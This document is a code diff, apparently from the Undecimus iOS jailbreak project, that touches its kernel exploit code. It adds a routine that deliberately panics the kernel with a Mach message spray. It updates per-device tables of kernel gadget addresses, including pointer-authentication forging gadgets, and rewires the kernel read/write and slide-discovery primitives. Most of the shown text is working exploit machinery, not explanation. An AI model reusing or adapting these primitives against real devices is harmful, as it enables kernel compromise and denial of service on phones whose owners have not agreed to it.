kern_return_t err;
|
||||
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
|
||||
if (err != KERN_SUCCESS)
|
||||
{
|
||||
printf(" [-] failed to allocate port\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
mach_port_limits_t limits = {0};
|
||||
limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
|
||||
err = mach_port_set_attributes(mach_task_self(),
|
||||
q,
|
||||
MACH_PORT_LIMITS_INFO,
|
||||
(mach_port_info_t)&limits,
|
||||
MACH_PORT_LIMITS_INFO_COUNT);
|
||||
if (err != KERN_SUCCESS)
|
||||
{
|
||||
printf(" [-] failed to increase queue limit\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;
|
||||
struct simple_msg *msg = malloc(msg_size);
|
||||
memset(msg, 0, sizeof(struct simple_msg));
|
||||
memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);
|
||||
|
||||
for (int i = 0; i < 256; i++)
|
||||
{
|
||||
msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
|
||||
msg->hdr.msgh_size = msg_size;
|
||||
msg->hdr.msgh_remote_port = q;
|
||||
msg->hdr.msgh_local_port = MACH_PORT_NULL;
|
||||
msg->hdr.msgh_id = 0x41414142;
|
||||
|
||||
err = mach_msg(&msg->hdr,
|
||||
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
|
||||
msg_size,
|
||||
0,
|
||||
MACH_PORT_NULL,
|
||||
MACH_MSG_TIMEOUT_NONE,
|
||||
MACH_PORT_NULL);
|
||||
|
||||
if (err != KERN_SUCCESS)
|
||||
{
|
||||
printf(" [-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err));
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
}
|
||||
|
||||
return q;
|
||||
}
|
||||
|
||||
static uint32_t message_size_for_kalloc_size(uint32_t size)
|
||||
{
|
||||
return ((size * 3) / 4) - 0x74;
|
||||
}
|
||||
|
||||
void do_kalloc_crash() {
|
||||
for (;;) {
|
||||
uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
|
||||
uint8_t *body = malloc(body_size);
|
||||
memset(body, 0x41, body_size);
|
||||
send_kalloc_message(body, body_size);
|
||||
SafeFreeNULL(body);
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,16 @@
|
||||
//
|
||||
// panic.h
|
||||
// Undecimus
|
||||
//
|
||||
// Created by Pwn20wnd on 4/20/19.
|
||||
// Copyright © 2019 Pwn20wnd. All rights reserved.
|
||||
//
|
||||
|
||||
#ifndef panic_h
|
||||
#define panic_h
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
void do_kalloc_crash(void);
|
||||
|
||||
#endif /* panic_h */
|
||||
@@ -9,6 +9,7 @@
|
||||
#include "log.h"
|
||||
#include "platform.h"
|
||||
#include "platform_match.h"
|
||||
#include "KernelUtilities.h"
|
||||
|
||||
// ---- Initialization routines -------------------------------------------------------------------
|
||||
|
||||
@@ -64,136 +65,28 @@ static struct initialization offsets[] = {
|
||||
#define SLIDE(address) (address == 0 ? 0 : address + kernel_slide)
|
||||
|
||||
static void
|
||||
addresses__iphone11_8__16C50() {
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_start) = SLIDE(0xfffffff008f3ce30);
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_stop) = SLIDE(0xfffffff008f3ce38);
|
||||
ADDRESS(l2tp_domain_inited) = SLIDE(0xfffffff0090b72a0);
|
||||
ADDRESS(sysctl__net_ppp_l2tp) = SLIDE(0xfffffff008f3cd18);
|
||||
ADDRESS(sysctl_unregister_oid) = SLIDE(0xfffffff007ebd1f0);
|
||||
ADDRESS(mov_x0_x4__br_x5) = SLIDE(0xfffffff0087f7cd8);
|
||||
ADDRESS(mov_x9_x0__br_x1) = SLIDE(0xfffffff00882912c);
|
||||
ADDRESS(mov_x10_x3__br_x6) = SLIDE(0xfffffff0087e82dc);
|
||||
ADDRESS(kernel_forge_pacia_gadget) = SLIDE(0xfffffff007b66d38);
|
||||
ADDRESS(kernel_forge_pacda_gadget) = SLIDE(0xfffffff007b66d60);
|
||||
ADDRESS(IOUserClient__vtable) = SLIDE(0xfffffff0077b4e28);
|
||||
ADDRESS(IORegistryEntry__getRegistryEntryID) = SLIDE(0xfffffff0080158f0);
|
||||
|
||||
SIZE(kernel_forge_pacxa_gadget_buffer) = 0x110;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, first_access) = 0xe8;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result) = 0xf0;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result) = 0xe8;
|
||||
}
|
||||
|
||||
static void
|
||||
addresses__iphone11_2__16C50() {
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_start) = SLIDE(0xfffffff008fd8be8);
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_stop) = SLIDE(0xfffffff008fd8bf0);
|
||||
ADDRESS(l2tp_domain_inited) = SLIDE(0xfffffff009154688);
|
||||
ADDRESS(sysctl__net_ppp_l2tp) = SLIDE(0xfffffff008fd8ad0);
|
||||
ADDRESS(sysctl_unregister_oid) = SLIDE(0xfffffff007eed1f0);
|
||||
ADDRESS(mov_x0_x4__br_x5) = SLIDE(0xfffffff00885b230);
|
||||
ADDRESS(mov_x9_x0__br_x1) = SLIDE(0xfffffff00888c684);
|
||||
ADDRESS(mov_x10_x3__br_x6) = SLIDE(0xfffffff00884b834);
|
||||
ADDRESS(kernel_forge_pacia_gadget) = SLIDE(0xfffffff007b96d38);
|
||||
ADDRESS(kernel_forge_pacda_gadget) = SLIDE(0xfffffff007b96d60);
|
||||
SIZE(kernel_forge_pacxa_gadget_buffer) = 0x110;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, first_access) = 0xe8;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result) = 0xf0;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result) = 0xe8;
|
||||
ADDRESS(IOUserClient__vtable) = SLIDE(0xfffffff0077d4e28);
|
||||
ADDRESS(IORegistryEntry__getRegistryEntryID) = SLIDE(0xfffffff0080458f0);
|
||||
}
|
||||
|
||||
static void
|
||||
addresses__iphone10_1__16B92() {
|
||||
ADDRESS(IOUserClient__vtable) = SLIDE(0xfffffff0070cc668);
|
||||
ADDRESS(IORegistryEntry__getRegistryEntryID) = SLIDE(0xfffffff007594f04);
|
||||
}
|
||||
|
||||
static void
|
||||
addresses__iphone11_6__16B92(){
|
||||
// Thx SparkDev_
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_start) = SLIDE(0xfffffff008ff8d38);
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_stop) = SLIDE(0xfffffff008ff8d40);
|
||||
|
||||
ADDRESS(l2tp_domain_inited) = SLIDE(0xfffffff009174760);
|
||||
|
||||
ADDRESS(sysctl__net_ppp_l2tp) = SLIDE(0xfffffff008ff8c20);
|
||||
ADDRESS(sysctl_unregister_oid) = SLIDE(0xfffffff007f0ffb0);
|
||||
|
||||
ADDRESS(mov_x0_x4__br_x5) = SLIDE(0xfffffff00887b5f0);
|
||||
ADDRESS(mov_x9_x0__br_x1) = SLIDE(0xfffffff0088aca44);
|
||||
ADDRESS(mov_x10_x3__br_x6) = SLIDE(0xfffffff00886bbf4);
|
||||
|
||||
ADDRESS(kernel_forge_pacia_gadget) = SLIDE(0xfffffff007bb9278);
|
||||
ADDRESS(kernel_forge_pacda_gadget) = SLIDE(0xfffffff007bb92a0);
|
||||
ADDRESS(IOUserClient__vtable) = SLIDE(0xfffffff0077f8e48);
|
||||
|
||||
ADDRESS(IORegistryEntry__getRegistryEntryID) = SLIDE(0xfffffff008068334);
|
||||
|
||||
SIZE(kernel_forge_pacxa_gadget_buffer) = 0x110;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, first_access) = 0xe8;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result) = 0xf0;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result) = 0xe8;
|
||||
}
|
||||
|
||||
static void
|
||||
addresses__iphone10_1__16C101() {
|
||||
ADDRESS(IOUserClient__vtable) = SLIDE(0xfffffff0070cc648);
|
||||
ADDRESS(IORegistryEntry__getRegistryEntryID) = SLIDE(0xfffffff00759424c);
|
||||
}
|
||||
|
||||
static void
|
||||
addresses__iphone11_6__16A405() {
|
||||
// string com.apple.driver.AppleSynopsysOTGDevice
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_start) = SLIDE(0xfffffff008fe4c80);
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_stop) = SLIDE(0xfffffff008fe4c88);
|
||||
|
||||
// Go to *(module start)
|
||||
// look for _IOLog("L2TP domain init : can't add proto to l2tp domain, err : %d\n");
|
||||
// call before that does bzero on l2tp_domain_inited + 8
|
||||
ADDRESS(l2tp_domain_inited) = SLIDE(0xfffffff0091607e8);
|
||||
|
||||
// sysctl_unregister_oid(sysctl__net_ppp_l2tp) is called in the end of *(module start/stop)
|
||||
// Right after
|
||||
// _IOLog("L2TP domain terminate : PF_PPP domain does not exist...\n");
|
||||
ADDRESS(sysctl__net_ppp_l2tp) = SLIDE(0xfffffff008fe4b68);
|
||||
ADDRESS(sysctl_unregister_oid) = SLIDE(0xfffffff007f098a0);
|
||||
// Either search for exact match in hex editor
|
||||
// Or dump whole fairplayiokit and look for gadgets in it
|
||||
ADDRESS(mov_x0_x4__br_x5) = SLIDE(0xfffffff00886c278);
|
||||
ADDRESS(mov_x9_x0__br_x1) = SLIDE(0xfffffff00889d6cc);
|
||||
ADDRESS(mov_x10_x3__br_x6) = SLIDE(0xfffffff00885c87c);
|
||||
ADDRESS(kernel_forge_pacia_gadget) = SLIDE(0xfffffff007bb2c58);
|
||||
ADDRESS(kernel_forge_pacda_gadget) = SLIDE(0xfffffff007bb2c80);
|
||||
|
||||
// Start disassembling whole kernel
|
||||
// look for __ZN11OSMetaClassC2EPKcPKS_j(ARG-1,"IOUserClient",...);
|
||||
// there would be two occurencies
|
||||
// between them vtable would be referenced twice
|
||||
// in two identical functions following each other
|
||||
ADDRESS(IOUserClient__vtable) = SLIDE(0xfffffff0077f0e48);
|
||||
|
||||
// Look for __ZNK15IORegistryEntry16copyPropertyKeysEv in
|
||||
// jtool2 ((beta 1, TLV) compiled on Jan 31 2019 14:42:24)
|
||||
// companion file -- it's two lines below
|
||||
// verify that second destructor calls zfree
|
||||
ADDRESS(IORegistryEntry__getRegistryEntryID) = SLIDE(0xfffffff008061b90);
|
||||
|
||||
SIZE(kernel_forge_pacxa_gadget_buffer) = 0x110;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, first_access) = 0xe8;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result) = 0xf0;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result) = 0xe8;
|
||||
addresses__iphone11_2__16A366() {
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_start) = getoffset(paciza_pointer__l2tp_domain_module_start);
|
||||
ADDRESS(paciza_pointer__l2tp_domain_module_stop) = getoffset(paciza_pointer__l2tp_domain_module_stop);
|
||||
ADDRESS(l2tp_domain_inited) = getoffset(l2tp_domain_inited);
|
||||
ADDRESS(sysctl__net_ppp_l2tp) = getoffset(sysctl__net_ppp_l2tp);
|
||||
ADDRESS(sysctl_unregister_oid) = getoffset(sysctl_unregister_oid);
|
||||
ADDRESS(mov_x0_x4__br_x5) = getoffset(mov_x0_x4__br_x5);
|
||||
ADDRESS(mov_x9_x0__br_x1) = getoffset(mov_x9_x0__br_x1);
|
||||
ADDRESS(mov_x10_x3__br_x6) = getoffset(mov_x10_x3__br_x6);
|
||||
ADDRESS(kernel_forge_pacia_gadget) = getoffset(kernel_forge_pacia_gadget);
|
||||
ADDRESS(kernel_forge_pacda_gadget) = getoffset(kernel_forge_pacda_gadget);
|
||||
SIZE(kernel_forge_pacxa_gadget_buffer) = 0x110;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, first_access) = 0xe8;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result) = 0xf0;
|
||||
OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result) = 0xe8;
|
||||
ADDRESS(IOUserClient__vtable) = getoffset(IOUserClient__vtable);
|
||||
ADDRESS(IORegistryEntry__getRegistryEntryID) = getoffset(IORegistryEntry__getRegistryEntryID);
|
||||
}
|
||||
|
||||
// A list of address initializations by platform.
|
||||
static struct initialization addresses[] = {
|
||||
{ "iPhone11,8", "16C50-16C104", addresses__iphone11_8__16C50 },
|
||||
{ "iPhone11,2", "16C50-16C104", addresses__iphone11_2__16C50 },
|
||||
{ "iPhone10,1", "16B92", addresses__iphone10_1__16B92 },
|
||||
{ "iPhone11,6", "16B92", addresses__iphone11_6__16B92 },
|
||||
{ "iPhone10,1", "16C101", addresses__iphone10_1__16C101 },
|
||||
{ "iPhone11,6", "16A405", addresses__iphone11_6__16A405 },
|
||||
{ "*", "16A366-16D5024a", addresses__iphone11_2__16A366 },
|
||||
};
|
||||
|
||||
// ---- PAC initialization ------------------------------------------------------------------------
|
||||
@@ -258,7 +151,7 @@ pac__iphone11_8__16C50() {
|
||||
|
||||
// A list of PAC initializations by platform.
|
||||
static struct initialization pac_codes[] = {
|
||||
{ "iPhone11,*", "*", pac__iphone11_8__16C50 },
|
||||
{ "*", "*", pac__iphone11_8__16C50 },
|
||||
};
|
||||
|
||||
#endif // __arm64e__
|
||||
|
||||
@@ -14,6 +14,7 @@
|
||||
#include "log.h"
|
||||
#include "parameters.h"
|
||||
#include "platform.h"
|
||||
#include "common.h"
|
||||
|
||||
// Compute the minimum of 2 values.
|
||||
#define min(a, b) ((a) < (b) ? (a) : (b))
|
||||
@@ -108,9 +109,7 @@ ool_ports_spray_port(mach_port_t holding_port,
|
||||
}
|
||||
}
|
||||
// Clean up the allocated ports.
|
||||
if (alloc_ports != NULL) {
|
||||
free(alloc_ports);
|
||||
}
|
||||
SafeFreeNULL(alloc_ports);
|
||||
// Return the number of messages we sent.
|
||||
return messages_sent;
|
||||
}
|
||||
@@ -357,7 +356,7 @@ ool_ports_spray_size_with_gc(mach_port_t *holding_ports, size_t *holding_port_co
|
||||
for (; ports_used < port_count && ools_left > 0; ports_used++) {
|
||||
// Spray this port one message at a time until we've maxed out its queue.
|
||||
size_t messages_sent = 0;
|
||||
for (; messages_sent < (kCFCoreFoundationVersionNumber >= 1535.12 ? MACH_PORT_QLIMIT_MAX : MACH_PORT_QLIMIT_DEFAULT) && ools_left > 0; messages_sent++) {
|
||||
for (; messages_sent < (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? MACH_PORT_QLIMIT_MAX : MACH_PORT_QLIMIT_DEFAULT) && ools_left > 0; messages_sent++) {
|
||||
// If we've crossed the GC sleep boundary, sleep for a bit and schedule the
|
||||
// next one.
|
||||
if (sprayed >= next_gc_step) {
|
||||
@@ -422,7 +421,7 @@ port_drain_messages(mach_port_t port, void (^message_handler)(mach_msg_header_t
|
||||
}
|
||||
// The buffer was too small, increase it.
|
||||
msg_size = msg->header.msgh_size + REQUESTED_TRAILER_SIZE(options);
|
||||
free(msg);
|
||||
SafeFreeNULL(msg);
|
||||
msg = malloc(msg_size);
|
||||
assert(msg != NULL);
|
||||
}
|
||||
@@ -439,7 +438,7 @@ port_drain_messages(mach_port_t port, void (^message_handler)(mach_msg_header_t
|
||||
message_handler(&msg->header);
|
||||
}
|
||||
// Clean up resources.
|
||||
free(msg);
|
||||
SafeFreeNULL(msg);
|
||||
}
|
||||
|
||||
void
|
||||
|
||||
@@ -165,7 +165,7 @@ size_t ool_ports_spray_size_with_gc(mach_port_t *holding_ports, size_t *holding_
|
||||
*
|
||||
* Description:
|
||||
* Create an array of Mach ports. The Mach ports are receive rights only. Once the array is no
|
||||
* longer needed, deallocate it with free().
|
||||
* longer needed, deallocate it with SafeFreeNULL().
|
||||
*/
|
||||
mach_port_t *create_ports(size_t count);
|
||||
|
||||
|
||||
@@ -13,32 +13,14 @@
|
||||
|
||||
bool
|
||||
kernel_read(uint64_t address, void *data, size_t size) {
|
||||
mach_vm_size_t size_out;
|
||||
kern_return_t kr = mach_vm_read_overwrite(kernel_task_port, address,
|
||||
size, (mach_vm_address_t) data, &size_out);
|
||||
if (kr != KERN_SUCCESS) {
|
||||
ERROR("%s returned %d: %s", "mach_vm_read_overwrite", kr, mach_error_string(kr));
|
||||
ERROR("could not %s address 0x%016llx", "read", address);
|
||||
return false;
|
||||
}
|
||||
if (size_out != size) {
|
||||
ERROR("partial read of address 0x%016llx: %llu of %zu bytes",
|
||||
address, size_out, size);
|
||||
return false;
|
||||
}
|
||||
return true;
|
||||
extern bool rkbuffer(uint64_t kaddr, void* buffer, size_t length);
|
||||
return rkbuffer(address, data, size);
|
||||
}
|
||||
|
||||
bool
|
||||
kernel_write(uint64_t address, const void *data, size_t size) {
|
||||
kern_return_t kr = mach_vm_write(kernel_task_port, address,
|
||||
(mach_vm_address_t) data, (mach_msg_size_t) size);
|
||||
if (kr != KERN_SUCCESS) {
|
||||
ERROR("%s returned %d: %s", "mach_vm_write", kr, mach_error_string(kr));
|
||||
ERROR("could not %s address 0x%016llx", "write", address);
|
||||
return false;
|
||||
}
|
||||
return true;
|
||||
extern bool wkbuffer(uint64_t kaddr, void* buffer, size_t length);
|
||||
return wkbuffer(address, (void *)data, size);
|
||||
}
|
||||
|
||||
uint8_t
|
||||
|
||||
@@ -14,6 +14,8 @@
|
||||
#include "parameters.h"
|
||||
#include "platform.h"
|
||||
|
||||
uint64_t kernel_slide = -1;
|
||||
|
||||
/*
|
||||
* is_kernel_base
|
||||
*
|
||||
@@ -43,7 +45,7 @@ is_kernel_base(uint64_t base) {
|
||||
|
||||
bool
|
||||
kernel_slide_init() {
|
||||
if (kernel_slide != 0) {
|
||||
if (kernel_slide != -1) {
|
||||
return true;
|
||||
}
|
||||
// Get the address of the host port.
|
||||
@@ -63,7 +65,7 @@ kernel_slide_init() {
|
||||
|
||||
bool
|
||||
kernel_slide_init_with_kernel_image_address(uint64_t address) {
|
||||
if (kernel_slide != 0) {
|
||||
if (kernel_slide != -1) {
|
||||
return true;
|
||||
}
|
||||
// Find the highest possible kernel base address that could still correspond to the given
|
||||
@@ -73,7 +75,7 @@ kernel_slide_init_with_kernel_image_address(uint64_t address) {
|
||||
base = base + ((address - base) / kernel_slide_step) * kernel_slide_step;
|
||||
// Now walk backwards from that kernel base one kernel slide at a time until we find the
|
||||
// real kernel base.
|
||||
while (base > STATIC_ADDRESS(kernel_base)) {
|
||||
while (base >= STATIC_ADDRESS(kernel_base)) {
|
||||
bool found = is_kernel_base(base);
|
||||
if (found) {
|
||||
kernel_slide = base - STATIC_ADDRESS(kernel_base);
|
||||
|
||||
@@ -8,10 +8,6 @@
|
||||
#include <stdbool.h>
|
||||
#include <stdint.h>
|
||||
|
||||
#ifdef KERNEL_SLIDE_EXTERN
|
||||
#define extern KERNEL_SLIDE_EXTERN
|
||||
#endif
|
||||
|
||||
/*
|
||||
* kernel_slide
|
||||
*
|
||||
|
||||
@@ -7,6 +7,7 @@
|
||||
#include <assert.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#import <common.h>
|
||||
|
||||
void
|
||||
log_internal(char type, const char *format, ...) {
|
||||
@@ -30,8 +31,8 @@ log_stderr(char type, const char *format, va_list ap) {
|
||||
case 'W': type = '!'; break;
|
||||
case 'E': type = '-'; break;
|
||||
}
|
||||
fprintf(stderr, "[%c] %s\n", type, message);
|
||||
free(message);
|
||||
RAWLOG("[%c] %s\n", type, message);
|
||||
SafeFreeNULL(message);
|
||||
}
|
||||
|
||||
void (*log_implementation)(char type, const char *format, va_list ap) = log_stderr;
|
||||
|
||||
@@ -1,263 +0,0 @@
|
||||
// (C)2009 Willem Hengeveld itsme@xs4all.nl
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <algorithm>
|
||||
|
||||
// streaming version of the lzss algorithm, as defined in BootX-75/bootx.tproj/sl.subproj/lzss.c
|
||||
// you can use lzssdec in a filter, like:
|
||||
//
|
||||
// cat file.lzss | lzssdec > file.decompressed
|
||||
//
|
||||
static int g_debug= 0;
|
||||
|
||||
class lzssdecompress
|
||||
{
|
||||
enum { COPYFROMDICT, EXPECTINGFLAG, PROCESSFLAGBIT, EXPECTING2NDBYTE };
|
||||
int _state;
|
||||
uint8_t _flags;
|
||||
int _bitnr;
|
||||
uint8_t *_src, *_srcend;
|
||||
uint8_t *_dst, *_dstend;
|
||||
uint8_t _firstbyte;
|
||||
|
||||
uint8_t *_dict;
|
||||
|
||||
int _dictsize;
|
||||
int _maxmatch;
|
||||
int _copythreshold;
|
||||
|
||||
int _dictptr;
|
||||
|
||||
int _copyptr;
|
||||
int _copycount;
|
||||
|
||||
int _inputoffset;
|
||||
int _outputoffset;
|
||||
public:
|
||||
lzssdecompress()
|
||||
{
|
||||
_maxmatch= 18; // 4 bit size + threshold
|
||||
_dictsize= 4096; // 12 bit size
|
||||
_copythreshold= 3; // 0 == copy 3 bytes
|
||||
_dict= new uint8_t[_dictsize+_maxmatch-1];
|
||||
|
||||
reset();
|
||||
}
|
||||
~lzssdecompress()
|
||||
{
|
||||
delete[] _dict;
|
||||
_dict= 0; _dictsize= 0;
|
||||
}
|
||||
void reset()
|
||||
{
|
||||
_state=EXPECTINGFLAG;
|
||||
_flags= 0; _bitnr= 0;
|
||||
_src=_srcend=_dst=_dstend=0;
|
||||
memset(_dict, ' ', _dictsize+_maxmatch-1);
|
||||
_dictptr= _dictsize-_maxmatch;
|
||||
_inputoffset= 0;
|
||||
_outputoffset= 0;
|
||||
_firstbyte= 0;
|
||||
_copyptr= 0;
|
||||
_copycount= 0;
|
||||
}
|
||||
void decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uint8_t *src, uint32_t srclen, uint32_t *psrcused)
|
||||
{
|
||||
_src= src; _srcend= src+srclen;
|
||||
_dst= dst; _dstend= dst+dstlen;
|
||||
|
||||
while (_src<_srcend && _dst<_dstend)
|
||||
{
|
||||
switch(_state)
|
||||
{
|
||||
case EXPECTINGFLAG:
|
||||
if (g_debug) fprintf(stderr, "%08x,%08x: flag: %02x\n", _inputoffset, _outputoffset, *_src);
|
||||
_flags= *_src++;
|
||||
_inputoffset++;
|
||||
_bitnr= 0;
|
||||
_state= PROCESSFLAGBIT;
|
||||
break;
|
||||
case PROCESSFLAGBIT:
|
||||
if (_flags&1) {
|
||||
if (g_debug) fprintf(stderr, "%08x,%08x: bit%d: %03x copybyte %02x\n", _inputoffset, _outputoffset, _bitnr, _dictptr, *_src);
|
||||
addtodict(*_dst++ = *_src++);
|
||||
_inputoffset++;
|
||||
_outputoffset++;
|
||||
nextflagbit();
|
||||
}
|
||||
else {
|
||||
_firstbyte= *_src++;
|
||||
_inputoffset++;
|
||||
_state= EXPECTING2NDBYTE;
|
||||
}
|
||||
break;
|
||||
case EXPECTING2NDBYTE:
|
||||
{
|
||||
uint8_t secondbyte= *_src++;
|
||||
_inputoffset++;
|
||||
setcounter(_firstbyte, secondbyte);
|
||||
if (g_debug) fprintf(stderr, "%08x,%08x: bit%d: %03x %02x %02x : copy %d bytes from %03x", _inputoffset-2, _outputoffset, _bitnr, _dictptr, _firstbyte, secondbyte, _copycount, _copyptr);
|
||||
if (g_debug) dumpcopydata();
|
||||
_state= COPYFROMDICT;
|
||||
}
|
||||
break;
|
||||
case COPYFROMDICT:
|
||||
copyfromdict();
|
||||
break;
|
||||
}
|
||||
}
|
||||
if (g_debug) fprintf(stderr, "decompress state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
|
||||
if (pdstused) *pdstused= _dst-dst;
|
||||
if (psrcused) *psrcused= _src-src;
|
||||
}
|
||||
void flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused)
|
||||
{
|
||||
if (g_debug) fprintf(stderr, "flash before state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
|
||||
_src= _srcend= NULL;
|
||||
_dst= dst; _dstend= dst+dstlen;
|
||||
|
||||
if (_state==COPYFROMDICT)
|
||||
copyfromdict();
|
||||
|
||||
if (pdstused) *pdstused= _dst-dst;
|
||||
if (g_debug) fprintf(stderr, "flash after state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
|
||||
}
|
||||
void copyfromdict()
|
||||
{
|
||||
while (_dst<_dstend && _copycount)
|
||||
{
|
||||
addtodict(*_dst++ = _dict[_copyptr++]);
|
||||
_outputoffset++;
|
||||
_copycount--;
|
||||
_copyptr= _copyptr&(_dictsize-1);
|
||||
}
|
||||
if (_copycount==0)
|
||||
nextflagbit();
|
||||
}
|
||||
void dumpcopydata()
|
||||
{
|
||||
// note: we are printing incorrect data, if _copyptr == _dictptr-1
|
||||
for (int i=0 ; i<_copycount ; i++)
|
||||
fprintf(stderr, " %02x", _dict[(_copyptr+i)&(_dictsize-1)]);
|
||||
fprintf(stderr, "\n");
|
||||
}
|
||||
void addtodict(uint8_t c)
|
||||
{
|
||||
_dict[_dictptr++]= c;
|
||||
_dictptr = _dictptr&(_dictsize-1);
|
||||
}
|
||||
void nextflagbit()
|
||||
{
|
||||
_bitnr++;
|
||||
_flags>>=1;
|
||||
_state = _bitnr==8 ? EXPECTINGFLAG : PROCESSFLAGBIT;
|
||||
}
|
||||
void setcounter(uint8_t first, uint8_t second)
|
||||
{
|
||||
_copyptr= first | ((second&0xf0)<<4);
|
||||
_copycount= _copythreshold + (second&0xf);
|
||||
}
|
||||
};
|
||||
|
||||
void usage(int argc,char**argv)
|
||||
{
|
||||
char *name = NULL;
|
||||
name = strrchr(argv[0], '/');
|
||||
fprintf(stderr, "Usage: %s [-d] [-o OFFSET] <kernelcache> <output>\n",(name ? name + 1: argv[0]));
|
||||
}
|
||||
extern "C" int lzssdec(int argc,char**argv)
|
||||
{
|
||||
FILE *readFrom = NULL;
|
||||
FILE *outputDir = NULL;
|
||||
|
||||
// _setmode(fileno(stdin),O_BINARY);
|
||||
// _setmode(fileno(stdout),O_BINARY);
|
||||
|
||||
#define HANDLEULOPTION(var, type) (argv[i][2] ? var= (type)strtoul(argv[i]+2, 0, 0) : i+1<argc ? var= (type)strtoul(argv[++i], 0, 0) : 0)
|
||||
|
||||
uint32_t skipbytes=0;
|
||||
if (argc < 2)
|
||||
{
|
||||
usage(argc, argv);
|
||||
return 0;
|
||||
}
|
||||
for (int i=1 ; i<argc ; i++)
|
||||
{
|
||||
if (argv[i][0]=='-') switch(argv[i][1])
|
||||
{
|
||||
case 'd': g_debug++;
|
||||
if (argv[i][2]=='d')
|
||||
g_debug++;
|
||||
break;
|
||||
case 'o': HANDLEULOPTION(skipbytes, uint32_t); break;
|
||||
default:
|
||||
usage(argc, argv);
|
||||
return 1;
|
||||
}
|
||||
else if (argv[i][0]=='/') {
|
||||
if (readFrom) {
|
||||
printf("[lzss] Opening %s for writing\n", argv[i]);
|
||||
outputDir = fopen(argv[i], "w+b");
|
||||
}
|
||||
else {
|
||||
printf("[lzss] Opening %s for reading\n", argv[i]);
|
||||
readFrom = fopen(argv[i], "rb");
|
||||
}
|
||||
}
|
||||
else {
|
||||
usage(argc, argv);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
#define CHUNK 0x10000
|
||||
|
||||
lzssdecompress lzss;
|
||||
uint8_t *ibuf= (uint8_t*)malloc(CHUNK);
|
||||
uint8_t *obuf= (uint8_t*)malloc(CHUNK);
|
||||
|
||||
// skip first <skipbytes> bytes
|
||||
while (skipbytes && !feof(readFrom)) {
|
||||
int nr= fread(ibuf, 1, std::min(skipbytes,(uint32_t)CHUNK), readFrom);
|
||||
skipbytes -= nr;
|
||||
}
|
||||
|
||||
while (!feof(readFrom))
|
||||
{
|
||||
size_t nr= fread(ibuf, 1, CHUNK, readFrom);
|
||||
if (nr==0) {
|
||||
perror("read");
|
||||
return 1;
|
||||
}
|
||||
if (nr==0)
|
||||
break;
|
||||
|
||||
size_t srcp= 0;
|
||||
while (srcp<nr) {
|
||||
uint32_t dstused;
|
||||
uint32_t srcused;
|
||||
lzss.decompress(obuf, CHUNK, &dstused, ibuf+srcp, nr-srcp, &srcused);
|
||||
srcp+=srcused;
|
||||
size_t nw= fwrite(obuf, 1, dstused, outputDir);
|
||||
if (nw<dstused) {
|
||||
perror("write");
|
||||
return 1;
|
||||
}
|
||||
if (g_debug) fprintf(stderr, "decompress: 0x%x -> 0x%x\n", srcused, dstused);
|
||||
}
|
||||
}
|
||||
if (g_debug) fprintf(stderr, "done reading\n");
|
||||
uint32_t dstused;
|
||||
lzss.flush(obuf, CHUNK, &dstused);
|
||||
size_t nw= fwrite(obuf, 1, dstused, outputDir);
|
||||
if (nw<dstused) {
|
||||
perror("write");
|
||||
return 1;
|
||||
}
|
||||
|
||||
if (g_debug) fprintf(stderr, "flush: %d bytes\n", dstused);
|
||||
|
||||
return 0;
|
||||
}
|
||||
@@ -1,17 +0,0 @@
|
||||
//
|
||||
// lzssdec.h
|
||||
// Undecimus
|
||||
//
|
||||
// Created by Pwn20wnd on 2/25/19.
|
||||
// Copyright © 2019 Pwn20wnd. All rights reserved.
|
||||
//
|
||||
|
||||
#ifndef lzssdec_h
|
||||
#define lzssdec_h
|
||||
|
||||
